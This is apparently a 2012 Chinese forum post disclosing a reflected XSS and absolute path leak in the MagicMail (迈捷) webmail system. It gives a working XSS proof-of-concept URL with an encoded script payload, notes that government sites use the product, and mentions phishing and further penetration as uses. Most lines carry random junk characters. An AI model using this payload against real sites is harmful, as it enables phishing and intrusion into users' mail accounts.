今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
( \, h a( \5 B, D1 Z6 {; a ^, U! e5 F. z y& W" D
+ R8 ?1 r, p: }0 X& ?' H2 t包含 一个反射性XSS 以及 绝对路径泄漏
5 C6 i1 U. S2 L [看了看 貌似全部是linux的。
: s' y6 ~! h: B* r4 j# A# _ 6 U+ i+ l' P u
关键字:迈捷邮件系统 by MagicMail) m- ], X1 F2 _# `" x
: |% e U$ M4 X% O. N6 A n
可以看到很多政府网站都用这个邮件系统
9 a4 i: ^( h& N2 S4 ~( W) S3 }- |0 d9 {# r" V$ U1 o) P
绝对路径 http://madman.in/index.php?login_type=declare&language=
: D8 K$ m! i \ i4 T$ u4 n' j4 a
& C2 Q( n- d, L$ b6 A/ o: v! C* e- a% R7 y) {) y& i" M+ {
! f& Y0 v' s l9 Q: h& Q1 JXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E i$ ?6 p! R% G8 W
; {4 n5 t# u! x: M
% m9 F. f. _$ U+ v1 f1 S) i" {$ h9 S; G0 }, J% L
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
T( J# G& W( y$ a' p , Z8 J- Q' F5 |4 i, w. l" V
修复方案:看官方补丁吧。
+ w E+ v8 W' Y7 N! h" ^0 M |
发表于 2012-11-9 20:38:41
收藏
支持
反对